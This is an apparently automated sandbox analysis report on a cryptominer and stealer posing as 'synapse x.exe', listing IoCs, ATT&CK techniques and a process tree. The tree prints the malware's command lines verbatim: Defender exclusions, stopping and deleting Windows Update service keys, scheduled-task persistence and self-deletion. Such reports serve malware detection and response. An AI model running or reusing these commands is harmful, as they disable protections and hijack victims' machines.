xmrig | ae49d51ca93adebeea1eae0fe3645809fe91671f63b2c8f2569a035d6ae7d38b

Resubmissions

18/01/2023, 17:14

230118-vsggjadf59 10

09/01/2023, 00:20

230109-am7rbaae6s 8

08/01/2023, 19:37

230108-yb3vzsee86 10

Analysis

max time kernel
599s
max time network
599s
platform
windows10-1703_x64
resource
win10-20220901-de
resource tags

arch:x64arch:x86image:win10-20220901-delocale:de-deos:windows10-1703-x64systemwindows
submitted
08/01/2023, 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

synapse x.exe
Size

10.0MB
MD5

e892f0f17f64eb412fbbd872527788b2
SHA1

bcb0aba5bce255debca0617512162a8fbd6780ab
SHA256

b3f8348d7f47ffd0be3b8c030444464ef7b35646e61d6afa142c56ac16566946
SHA512

ce527d24f6d0bf19762aeffa776cc2f16a594364b9a1976d323a2449b5ed8a3775921da0841f3c44437d4be8633fc4447b61d7a95e87c20191110a84155abf9c
SSDEEP

196608:0KtHxLgb5rHkzP4c7ZvwGPU8w8E2ke7kszHJ7fb:1HxLOdHMxNwGPRL7kk1

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 4748 created 2672	4748	1.exe	30
PID 4748 created 2672	4748	1.exe	30
PID 4748 created 2672	4748	1.exe	30
PID 4748 created 2672	4748	1.exe	30
PID 4748 created 2672	4748	1.exe	30
PID 996 created 2672	996	WindowsAutHost	30
PID 996 created 2672	996	WindowsAutHost	30
PID 996 created 2672	996	WindowsAutHost	30
PID 996 created 2672	996	WindowsAutHost	30
PID 4796 created 2672	4796	conhost.exe	30
PID 996 created 2672	996	WindowsAutHost	30

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral15/memory/4672-853-0x00007FF75D470000-0x00007FF75DC64000-memory.dmp	xmrig
behavioral15/memory/4672-855-0x00007FF75D470000-0x00007FF75DC64000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
4748	1.exe
996	WindowsAutHost

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral15/memory/4672-853-0x00007FF75D470000-0x00007FF75DC64000-memory.dmp	upx
behavioral15/memory/4672-855-0x00007FF75D470000-0x00007FF75DC64000-memory.dmp	upx

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4748	1.exe
4748	1.exe
996	WindowsAutHost
996	WindowsAutHost

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 996 set thread context of 4796	996	WindowsAutHost	122
PID 996 set thread context of 4672	996	WindowsAutHost	128

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\WindowsServices\WindowsAutHost	1.exe
File created	C:\Program Files\Google\Libs\WR64.sys	WindowsAutHost

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
872	sc.exe
908	sc.exe
416	sc.exe
4728	sc.exe
4832	sc.exe
160	sc.exe
3388	sc.exe
3552	sc.exe
5112	sc.exe
1244	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe
2824	synapse x.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	synapse x.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe
Token: SeRemoteShutdownPrivilege	4680	powershell.exe
Token: SeUndockPrivilege	4680	powershell.exe
Token: SeManageVolumePrivilege	4680	powershell.exe
Token: 33	4680	powershell.exe
Token: 34	4680	powershell.exe
Token: 35	4680	powershell.exe
Token: 36	4680	powershell.exe
Token: SeShutdownPrivilege	1896	powercfg.exe
Token: SeCreatePagefilePrivilege	1896	powercfg.exe
Token: SeShutdownPrivilege	756	powercfg.exe
Token: SeCreatePagefilePrivilege	756	powercfg.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeShutdownPrivilege	2228	powercfg.exe
Token: SeCreatePagefilePrivilege	2228	powercfg.exe
Token: SeShutdownPrivilege	4344	powercfg.exe
Token: SeCreatePagefilePrivilege	4344	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3868	powershell.exe
Token: SeSecurityPrivilege	3868	powershell.exe
Token: SeTakeOwnershipPrivilege	3868	powershell.exe
Token: SeLoadDriverPrivilege	3868	powershell.exe
Token: SeSystemProfilePrivilege	3868	powershell.exe
Token: SeSystemtimePrivilege	3868	powershell.exe
Token: SeProfSingleProcessPrivilege	3868	powershell.exe
Token: SeIncBasePriorityPrivilege	3868	powershell.exe
Token: SeCreatePagefilePrivilege	3868	powershell.exe
Token: SeBackupPrivilege	3868	powershell.exe
Token: SeRestorePrivilege	3868	powershell.exe
Token: SeShutdownPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeSystemEnvironmentPrivilege	3868	powershell.exe
Token: SeRemoteShutdownPrivilege	3868	powershell.exe
Token: SeUndockPrivilege	3868	powershell.exe
Token: SeManageVolumePrivilege	3868	powershell.exe
Token: 33	3868	powershell.exe
Token: 34	3868	powershell.exe
Token: 35	3868	powershell.exe
Token: 36	3868	powershell.exe
Token: SeIncreaseQuotaPrivilege	3868	powershell.exe
Token: SeSecurityPrivilege	3868	powershell.exe
Token: SeTakeOwnershipPrivilege	3868	powershell.exe
Token: SeLoadDriverPrivilege	3868	powershell.exe
Token: SeSystemProfilePrivilege	3868	powershell.exe
Token: SeSystemtimePrivilege	3868	powershell.exe
Token: SeProfSingleProcessPrivilege	3868	powershell.exe
Token: SeIncBasePriorityPrivilege	3868	powershell.exe
Token: SeCreatePagefilePrivilege	3868	powershell.exe
Token: SeBackupPrivilege	3868	powershell.exe
Token: SeRestorePrivilege	3868	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 2824	4944	synapse x.exe	66
PID 4944 wrote to memory of 2824	4944	synapse x.exe	66
PID 4944 wrote to memory of 2824	4944	synapse x.exe	66
PID 4944 wrote to memory of 2824	4944	synapse x.exe	66
PID 2824 wrote to memory of 5008	2824	synapse x.exe	68
PID 2824 wrote to memory of 5008	2824	synapse x.exe	68
PID 2824 wrote to memory of 5008	2824	synapse x.exe	68
PID 5008 wrote to memory of 4748	5008	rundll32.exe	69
PID 5008 wrote to memory of 4748	5008	rundll32.exe	69
PID 2456 wrote to memory of 4832	2456	cmd.exe	79
PID 2456 wrote to memory of 4832	2456	cmd.exe	79
PID 2436 wrote to memory of 1896	2436	cmd.exe	80
PID 2436 wrote to memory of 1896	2436	cmd.exe	80
PID 2456 wrote to memory of 160	2456	cmd.exe	81
PID 2456 wrote to memory of 160	2456	cmd.exe	81
PID 2436 wrote to memory of 756	2436	cmd.exe	82
PID 2436 wrote to memory of 756	2436	cmd.exe	82
PID 2436 wrote to memory of 2228	2436	cmd.exe	83
PID 2436 wrote to memory of 2228	2436	cmd.exe	83
PID 2456 wrote to memory of 3552	2456	cmd.exe	84
PID 2456 wrote to memory of 3552	2456	cmd.exe	84
PID 2436 wrote to memory of 4344	2436	cmd.exe	85
PID 2436 wrote to memory of 4344	2436	cmd.exe	85
PID 2456 wrote to memory of 5112	2456	cmd.exe	86
PID 2456 wrote to memory of 5112	2456	cmd.exe	86
PID 2456 wrote to memory of 3388	2456	cmd.exe	87
PID 2456 wrote to memory of 3388	2456	cmd.exe	87
PID 2456 wrote to memory of 1608	2456	cmd.exe	88
PID 2456 wrote to memory of 1608	2456	cmd.exe	88
PID 2456 wrote to memory of 4924	2456	cmd.exe	89
PID 2456 wrote to memory of 4924	2456	cmd.exe	89
PID 2456 wrote to memory of 4664	2456	cmd.exe	90
PID 2456 wrote to memory of 4664	2456	cmd.exe	90
PID 2456 wrote to memory of 2620	2456	cmd.exe	91
PID 2456 wrote to memory of 2620	2456	cmd.exe	91
PID 2456 wrote to memory of 1580	2456	cmd.exe	92
PID 2456 wrote to memory of 1580	2456	cmd.exe	92
PID 4892 wrote to memory of 4944	4892	cmd.exe	97
PID 4892 wrote to memory of 4944	4892	cmd.exe	97
PID 4956 wrote to memory of 4556	4956	powershell.exe	98
PID 4956 wrote to memory of 4556	4956	powershell.exe	98
PID 2824 wrote to memory of 872	2824	cmd.exe	108
PID 2824 wrote to memory of 872	2824	cmd.exe	108
PID 2824 wrote to memory of 908	2824	cmd.exe	109
PID 2824 wrote to memory of 908	2824	cmd.exe	109
PID 2824 wrote to memory of 416	2824	cmd.exe	110
PID 2824 wrote to memory of 416	2824	cmd.exe	110
PID 2824 wrote to memory of 4728	2824	cmd.exe	111
PID 2824 wrote to memory of 4728	2824	cmd.exe	111
PID 2824 wrote to memory of 1244	2824	cmd.exe	112
PID 2824 wrote to memory of 1244	2824	cmd.exe	112
PID 5072 wrote to memory of 428	5072	cmd.exe	113
PID 5072 wrote to memory of 428	5072	cmd.exe	113
PID 2824 wrote to memory of 4716	2824	cmd.exe	114
PID 2824 wrote to memory of 4716	2824	cmd.exe	114
PID 5072 wrote to memory of 3828	5072	cmd.exe	115
PID 5072 wrote to memory of 3828	5072	cmd.exe	115
PID 2824 wrote to memory of 188	2824	cmd.exe	116
PID 2824 wrote to memory of 188	2824	cmd.exe	116
PID 2824 wrote to memory of 204	2824	cmd.exe	117
PID 2824 wrote to memory of 204	2824	cmd.exe	117
PID 2824 wrote to memory of 2596	2824	cmd.exe	118
PID 2824 wrote to memory of 2596	2824	cmd.exe	118
PID 2824 wrote to memory of 2184	2824	cmd.exe	119

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2672
- C:\Users\Admin\AppData\Local\Temp\synapse x.exe
  "C:\Users\Admin\AppData\Local\Temp\synapse x.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Users\Admin\AppData\Local\Temp\synapse x.exe
    "C:\Users\Admin\AppData\Local\Temp\synapse x.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler C:\Users\Admin\AppData\Local\Temp\1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5008
    - - C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        
        PID:4748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yxmejq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4680
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4832
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:160
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3552
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5112
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3388
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1608
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4924
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4664
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2620
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1580
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:756
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#enlkvlex#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
    3⤵
    PID:4556
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2912
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:872
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:908
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:416
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4728
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1244
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4716
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:188
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:204
